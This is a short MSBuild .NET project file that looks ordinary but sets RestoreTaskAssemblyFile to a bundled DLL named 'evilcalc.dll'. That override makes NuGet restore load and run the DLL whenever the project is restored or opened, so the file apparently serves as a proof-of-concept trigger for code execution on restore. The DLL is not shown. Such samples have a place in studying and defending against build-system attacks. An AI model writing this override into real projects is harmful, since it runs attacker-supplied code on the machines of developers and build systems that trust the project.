<Project Sdk="Microsoft.NET.Sdk" TreatAsLocalProperty="RestoreTaskAssemblyFile">
	<PropertyGroup>
		<TargetFramework>net472</TargetFramework>
		<RestoreTaskAssemblyFile>$(MSBuildProjectDirectory)\evilcalc.dll</RestoreTaskAssemblyFile>
	</PropertyGroup>
	<ItemGroup>
		<PackageReference Include="Newtonsoft.Json" Version="13.0.1" />
	</ItemGroup>
</Project>	
